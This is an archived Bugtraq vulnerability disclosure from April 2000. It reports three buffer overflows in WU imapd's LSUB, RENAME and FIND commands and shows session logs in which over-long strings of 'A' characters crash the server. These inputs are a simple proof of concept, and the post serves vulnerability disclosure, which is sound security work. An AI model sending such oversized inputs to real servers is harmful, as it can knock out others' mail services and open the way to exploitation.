[14623] in bugtraq
Re: another WU imapd buffer overflow
daemon@ATHENA.MIT.EDU (Michal Szymanski)
Sat Apr 22 04:31:45 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <20000422002433.A5056@clico.pl>
Date: Sat, 22 Apr 2000 00:24:33 +0200
Reply-To: Michal Szymanski <siva9@CLICO.PL>
From: Michal Szymanski <siva9@CLICO.PL>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Hi again,
imapd seems to be very weak. I've found another three buffer overruns.
This time affected commands are LSUB, RENAME and FIND:
* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)
SIGSEGV received.
* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)
SIGSEGV received.
* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)
SIGSEGV received.
It seems that all two-argument commands in authenticated state - where second
argument is string - are vulnerable. I'm not sure, but ipop2/3d works fine in
all states, also in transaction state. Mark, Am I right?
Regards,
Michal Szymanski [michal_szymanski@linux.com.pl];
